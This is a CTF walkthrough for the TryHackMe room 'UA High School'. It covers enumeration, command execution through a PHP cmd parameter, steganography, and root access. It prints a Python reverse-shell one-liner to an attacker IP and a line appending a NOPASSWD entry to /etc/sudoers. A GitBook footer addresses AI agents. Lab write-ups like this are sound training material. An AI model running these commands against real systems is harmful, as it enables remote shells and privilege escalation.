> For the complete documentation index, see [llms.txt](https://cyb3r-phantom.gitbook.io/ua-high-school/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cyb3r-phantom.gitbook.io/ua-high-school/ua-high-school-a-tryhackme-writeup.md).

# UA High School - A TryHackMe Writeup

[UA High School](https://tryhackme.com/r/room/yueiua) created by [Fede1781](https://tryhackme.com/p/Fede1781)

Start the machine and let it fully boot. 

When we run nmap we see that we only have ports 22 and 80 open. 

<figure><img src="/files/4FG1E6Bm1FXRqex8KBff" alt=""><figcaption></figcaption></figure>

Since we have port 80 open with Apache we know there is most likely a website hosted. By browsing to the IP we get this page

<figure><img src="/files/kshPu1MuqIwcewJAAjRS" alt=""><figcaption></figcaption></figure>

By viewing the page source we can see that the CSS sheet is stored in the /assets folder. If we run gobuster on the main / and also the /assets folder (with -x php,html to see what files we find) we discover that there is a php file in there.&#x20;

<figure><img src="/files/iWf6NxKLGW26j9KqGXEM" alt=""><figcaption></figcaption></figure>

The PHP file does not load anything, however I wonder if we can try exploiting it somehow.&#x20;

By using the ?cmd=ls we get some sort of info

<figure><img src="/files/tPDk7XT7rttB1KGrQVp2" alt=""><figcaption></figcaption></figure>

Using Base64 decode we can see that this translates to the directory of the assets folder.&#x20;

<figure><img src="/files/OsPsKZi6b8xYaLTw07TL" alt=""><figcaption></figcaption></figure>

So it does look like we have some sort of access using the LFI exploit. Now we can navigate around and we can find a user, as well as the user.txt. However, we do not have permissions to view it because we are still the www-data user.  We have to find another way to gain access.&#x20;

We can get a reverse shell through python by going to revshells.com, selecting Python3#2. Make sure the IP and port are correct and start a netcat listener on your machine (nc -lvnp 4444) and then paste this code in your php?cmd=

```
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP-ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
```

<figure><img src="/files/1QipOzmt8x4KDCJsm4iU" alt=""><figcaption></figcaption></figure>

Once you hit enter, your nc listener should automatically connect to the device

<figure><img src="/files/hednVjA2cer9ksrNAiq7" alt=""><figcaption></figcaption></figure>

We are still www-data user though so we're not able to view user.txt.

We can poke around the system and find the user deku, but we also find a Hidden-Content folder as well as a oneforall.jpg file in the assets/images folder.  The Hidden-Content folder gives us a passphrase file, but this password isn't successful when trying to ssh using the deku user.  Back to the oneforall.jpg. When running file on this, we see it shows as a data file, not a JPG file. This tell us that something was alterted with it. I downloaded the file to my local machine and edited the magic numbers to the correct jpg file using hexeditor.&#x20;

<figure><img src="/files/K9Uid7LdF7MdhUIg87Id" alt=""><figcaption></figcaption></figure>

and now when running file on it, it shows as a correct jpg file and we can actually open and view the picture

<figure><img src="/files/MKLEjV8WKla7j7WdZUvh" alt=""><figcaption></figcaption></figure>

Viewing the pic doesn't give us anything, but we still have that passphrase, so lets see if there is anything hidden with steghide

<figure><img src="/files/2TAIFZ5Ncl0Qlcqh5PQt" alt=""><figcaption></figcaption></figure>

It now gives us a creds.txt file, which has the user:pass to SSH in as deku.  So now that we are in as deku, we can view the user.txt file.&#x20;

Now if we run sudo -l as deku, we can see that anyone can run a feedback.sh script

<figure><img src="/files/2ZsaI51kMu2eSYwFYXVg" alt=""><figcaption></figcaption></figure>

After running the feedback form a few times I tried to see if we could run a command to add deku to the sudoers file.&#x20;

deku ALL =NOPASSWD: ALL >> /etc/sudoers

after running this and then checking sudo -l again, we show that it was added successfully. If we run sudo /bin/bash we now have root access and can navigate to the root folder to view the root.txt file.&#x20;


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://cyb3r-phantom.gitbook.io/ua-high-school/ua-high-school-a-tryhackme-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.